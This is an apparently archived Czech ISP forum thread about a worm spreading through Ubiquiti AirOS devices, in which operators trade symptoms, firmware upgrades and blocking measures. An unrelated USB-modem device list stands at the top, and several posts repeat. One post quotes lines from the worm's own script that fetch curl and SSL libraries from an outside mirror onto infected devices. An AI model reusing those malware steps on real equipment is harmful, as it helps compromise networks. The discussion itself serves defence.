To: Ludvik
Obsah cardlist.txt nepovažuji za nebezpečný
#Vendor:Product:cdma/gsm:PPP dev handle:backend dev handle:AT+CSQ:pic file namebackendmode
1199:6880:gsm:/dev/ttyUSB4:/dev/ttyUSB3:AT+CSQ:3g_sierra_mercury_connect.gif:Sierra Wireless USB Connect Mercury:2
1199:6890:gsm:/dev/ttyUSB4:/dev/ttyUSB3:AT+CSQ:3g_sierra_usb888.gif:Sierra Wireless USB 888:3
1199:0025:cdma:/dev/ttyUSB0:/dev/ttyUSB1:AT+CSQ:3g_sierra_598U.gif:Sierra Wireless 598U:1
1199:68a3:gsm:/dev/ttyUSB0:/dev/ttyUSB1:AT+CSQ:3g_sierra_lightning_usb305.gif:Sierra Wireless Lightning USB 305:3
1199:683c:gsm:/dev/ttyUSB4:/dev/ttyUSB3:AT+CSQ:3g_sierra_mc8790.gif:Sierra MC8790 HSPA Module:3
1410:6000:cdma:/dev/ttyUSB0::AT+CSQ:3g_novatel_usb760.png:Novatel U760:0
1004:6141:gsm:/dev/ttyACM0:/dev/ttyACM1:AT+CSQ:3g_lg_usbconnect_turbo.gif:LGE USB Connect Turbo:3
1199:0024:cdma:/dev/ttyUSB0:/dev/ttyUSB1:AT+CSQ:3g_sierra_mc5727.gif:Sierra MC5727:1
1199:0224:cdma:/dev/ttyUSB0:/dev/ttyUSB1:AT+CSQ:3g_sierra_mc5727.gif:Sierra MC5727:1
1199:0028:cdma:/dev/ttyUSB0:/dev/ttyUSB1:AT+CSQ:3g_sierra_mc5728.gif:Sierra MC5728:1
#unverified that anything is on ttyUSB1
0af0:7a05:gsm:/dev/ttyUSB0:/dev/ttyUSB1:AT+CSQ:3g_option_usbconnect_velocity.gif:Option USB Connect Velocity:0
12d1:1464:gsm:/dev/ttyUSB0:/dev/ttyUSB3:AT+CSQ:3g_vodafone_huawei.gif:Vodafone Mobile Broadband (Huawei):3
19d2:0015:gsm:/dev/ttyUSB0:/dev/ttyUSB2:AT+CSQ:3g_zte_mf628.gif:ZTE MF628:3
19d2:0016:gsm:/dev/ttyUSB0:/dev/ttyUSB3:AT+CSQ:3g_zte_k3565_z.gif:Vodafone ZTE K3565-Z:3
19d2:0063:gsm:/dev/ttyUSB3:/dev/ttyUSB1:AT+CSQ:3g_zte_k3565_z.gif:Vodafone ZTE K3565-Z:3
19d2:0104:gsm:/dev/ttyUSB0:/dev/ttyUSB3:AT+CSQ:3g_zte_k4505_z.gif:Vodafone ZTE K4505-Z:3
12d1:140c:gsm:/dev/ttyUSB0:/dev/ttyUSB3:AT+CSQ:3g_huawei_E173.gif:Huawei E173:3
❗️Toto je původní verze internetového fóra ISPforum.cz do února 2020 bez možnosti registrace nových uživatelů. Aktivní verzi fóra naleznete na adrese https://telekomunikace.cz
Bezpečnostní chyba v AirOS
Takže máme prvního defaulťáka
Včera jsme projeli celou síť, provedli upgrade 5.6.5 a zdá se OK
Tam kde je nakaženo a dojde k restartu zařízení z jakehokoliv důvodu, dojde nastavení do default
vypadá to že bude ještě hodně veselo

Včera jsme projeli celou síť, provedli upgrade 5.6.5 a zdá se OK
Tam kde je nakaženo a dojde k restartu zařízení z jakehokoliv důvodu, dojde nastavení do default
vypadá to že bude ještě hodně veselo
0 x
U nás jsme našli verzi,která si stahuje curl z http://bo.mirror.garr.it/1/openwrt/kami ... 1_mips.ipk
Bez toho se nemůže šířit dál.
Bez toho se nemůže šířit dál.
0 x
Docela mě překvapuje, že se pouštíte do verze 5.6.5 - vzhledem k problémům s DFS a samovolného přelaďování do indooru.
Zkusil jsem zupgradovat první AP na 5.6.5 lup už je tam místo frekvence 5620--> 5180. Ještě, že na tom AP nic důležitého není:)
Ubiquity mluvilo na foru o nějaké verzi 5.5.11, která by snad už mohla být fixnutá. Neví o tom někdo něco blíž, případně odkud se dá stáhnout? Na ofiko stránkách není.
Zablokoval jsem download.openwrt.org, ale dle erotel to vypadá, že to virus stahuje odjinud, případně fungují nějaké mirrory:/
Zkusil jsem zupgradovat první AP na 5.6.5 lup už je tam místo frekvence 5620--> 5180. Ještě, že na tom AP nic důležitého není:)
Ubiquity mluvilo na foru o nějaké verzi 5.5.11, která by snad už mohla být fixnutá. Neví o tom někdo něco blíž, případně odkud se dá stáhnout? Na ofiko stránkách není.
Zablokoval jsem download.openwrt.org, ale dle erotel to vypadá, že to virus stahuje odjinud, případně fungují nějaké mirrory:/
0 x
Jak se muze virus nahrat do anteny, ktera je na neverejce ?
0 x
https://www.ORELSOFT.cz - ISP CZ / https://www.ORELSOFT.pl - ISP PL / https://www.levneVPS.cz - Hosting / https://www.GAMEHOSTING.cz - Herni hosting
Proc se schovavat v anonymite ? Kdyz neco delas, delej to na 100%, nebo se na to vyser.
Proc se schovavat v anonymite ? Kdyz neco delas, delej to na 100%, nebo se na to vyser.
whiteagle píše:
Zablokoval jsem download.openwrt.org, ale dle erotel to vypadá, že to virus stahuje odjinud, případně fungují nějaké mirrory:/
Mirrory asi ne,ta adresa je přímo ve skriptu.
Kód: Vybrat vše
test -e $per/curl || dwn http://bo.mirror.garr.it/1/openwrt/kamikaze/8.09.1/adm5120/packages/curl_7.17.1-1_mips.ipk usr/bin/curl
chmod +x $per/curl
test -e $per/libcurl.so.4 || dwn http://bo.mirror.garr.it/1/openwrt/kamikaze/8.09.1/adm5120/packages/libcurl_7.17.1-1_mips.ipk usr/lib/libcurl.so.4.0.1
mv $per/libcurl.so.4.0.1 $per/libcurl.so.4
test -e $per/libssl.so.0.9.8 || dwn http://bo.mirror.garr.it/1/openwrt/kamikaze/8.09.1/adm5120/packages/libopenssl_0.9.8i-3.1_mips.ipk 'usr/lib/lib*'
0 x
No napadá mě ještě jedna otázka - všechny naše antény nemají přístup na internet. Tím zabráním stažení toho souboru.
Je to řešení, nebo v sobě má ten "virus" i nějakou lokální kopii, aby nebylo potřeba lézt na internet?
Díky v.
Je to řešení, nebo v sobě má ten "virus" i nějakou lokální kopii, aby nebylo potřeba lézt na internet?
Díky v.
0 x
Ono už bude asi hodně mutací. Takže těžko odhadovat. Ale občas se UBNT s přístupem na internet vyskytne ... např. routery u koncových uživatelů. V tu chvilku je to uvnitř sítě. Pak je otázkou, na jaké procento ostatních UBNT se daný router dostane ... pokud alespoň na jeden, pravděpodobnost pádu sítě roste.
curl zatím stahuje z internetu. Takže je (dle mě) zařízení sice nakaženo, ale tím to končí (to byl podle mě můj případ, bohužel jsem ještě nenašel odkud to přišlo). Ale je asi jen otázkou času, kdy společně se svým kódem bude injektovat i curl nebo něco obdobného. Pak už kromě šíleně tvrdého paketového filtr neochrání zařízení nic. A i pak je riziko, že se jednou někde něco zapomene a jsme tam kde jsme byli.
curl zatím stahuje z internetu. Takže je (dle mě) zařízení sice nakaženo, ale tím to končí (to byl podle mě můj případ, bohužel jsem ještě nenašel odkud to přišlo). Ale je asi jen otázkou času, kdy společně se svým kódem bude injektovat i curl nebo něco obdobného. Pak už kromě šíleně tvrdého paketového filtr neochrání zařízení nic. A i pak je riziko, že se jednou někde něco zapomene a jsme tam kde jsme byli.
0 x
Jelikož je zde zakázáno se negativně vyjadřovat k provozním záležitostem, tak se holt musím vyjádřit takto: nové fórum tak jak je připravováno považuji za cestu do pekel. Nepřehledný maglajz z toho bude. Do podpisu se mi pozitiva již nevejdou.
ludvik píše:Ono už bude asi hodně mutací. Takže těžko odhadovat. Ale občas se UBNT s přístupem na internet vyskytne ... např. routery u koncových uživatelů. V tu chvilku je to uvnitř sítě. Pak je otázkou, na jaké procento ostatních UBNT se daný router dostane ... pokud alespoň na jeden, pravděpodobnost pádu sítě roste.
curl zatím stahuje z internetu. Takže je (dle mě) zařízení sice nakaženo, ale tím to končí (to byl podle mě můj případ, bohužel jsem ještě nenašel odkud to přišlo). Ale je asi jen otázkou času, kdy společně se svým kódem bude injektovat i curl nebo něco obdobného. Pak už kromě šíleně tvrdého paketového filtr neochrání zařízení nic. A i pak je riziko, že se jednou někde něco zapomene a jsme tam kde jsme byli.
Zdravím,
důležitá otázka: je u poslední verze frmw (aktuálně 5.6.4) Spolehlivě odstraněna ta primární chyba - jak se dostat dovniř bez hesla?
Děkuji, mpcz, 16/05/2016
0 x
mpcz píše:ludvik píše:Ono už bude asi hodně mutací. Takže těžko odhadovat. Ale občas se UBNT s přístupem na internet vyskytne ... např. routery u koncových uživatelů. V tu chvilku je to uvnitř sítě. Pak je otázkou, na jaké procento ostatních UBNT se daný router dostane ... pokud alespoň na jeden, pravděpodobnost pádu sítě roste.
curl zatím stahuje z internetu. Takže je (dle mě) zařízení sice nakaženo, ale tím to končí (to byl podle mě můj případ, bohužel jsem ještě nenašel odkud to přišlo). Ale je asi jen otázkou času, kdy společně se svým kódem bude injektovat i curl nebo něco obdobného. Pak už kromě šíleně tvrdého paketového filtr neochrání zařízení nic. A i pak je riziko, že se jednou někde něco zapomene a jsme tam kde jsme byli.
Zdravím,
důležitá otázka: je u poslední verze frmw (aktuálně 5.6.4) Spolehlivě odstraněna ta primární chyba - jak se dostat dovniř bez hesla?
Děkuji, mpcz, 16/05/2016
FW 5.6.5
dneska

0 x
UPDATE klienti SET internet_povolen = false WHERE po_splatnosti > 500
Lepší než výhra ve Sportce :)
Lepší než výhra ve Sportce :)
Když změním u zařízení porty pro http a https na nestandardni, tak by mělo být vyhráno, nebo ne? 

0 x
whiteagle píše:Když změním u zařízení porty pro http a https na nestandardni, tak by mělo být vyhráno, nebo ne?
U MF viru ano, ale brzy se urcite objevi modifikace, ktere skenuji i porty a pak to uz platit nemusi.
0 x
Zaujimavy je ten prenos od klientskeho napr. Airroutera alebo podobne do vasej siete. Tomuto by sa dalo predist izolaciou klientov na AP, pouzivate?
0 x
zeptám se je možné nahrát firmware 5.6.5 do infikovaného zařízení a firmware to vyřeší aniž by se zařízení podělalo ? zdá se že se vir začíná probourávat i u nás a vzhledem k našim 1000+ zařízení mi z toho trochu šedivý vlasy.... Díky 

0 x
UBNT mám rád, Mikrotik mám taky rád :-D považuji za zbytečné se přít co je lepší.
Jakub Havlíček
Jakub Havlíček
V 5.6.5 se to v mainu dá prohlídnout/stáhnout a smazat
. Otázka zda-li je to ok ale v /etc/persistent ls -a je to čisté. Tak to asi funguje.

0 x